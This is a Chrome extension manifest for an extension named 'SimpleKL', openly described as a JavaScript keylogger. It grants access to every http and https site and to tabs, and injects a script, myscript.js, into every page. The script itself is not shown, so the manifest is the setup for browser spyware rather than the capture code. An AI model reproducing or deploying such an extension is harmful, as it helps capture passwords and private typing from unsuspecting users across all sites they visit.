{
	"manifest_version": 2,
	"name": "SimpleKL",
	"description": "Simple JS based keylogger extension.",
	"version": "1.0",

	"permissions": [
		"http://*/*",
		"https://*/*",
		"tabs"
	],
  	"content_scripts": [{
	    "matches": ["<all_urls>"],
	    "js": ["myscript.js"],
	    "run_at": "document_end"
  	}]
}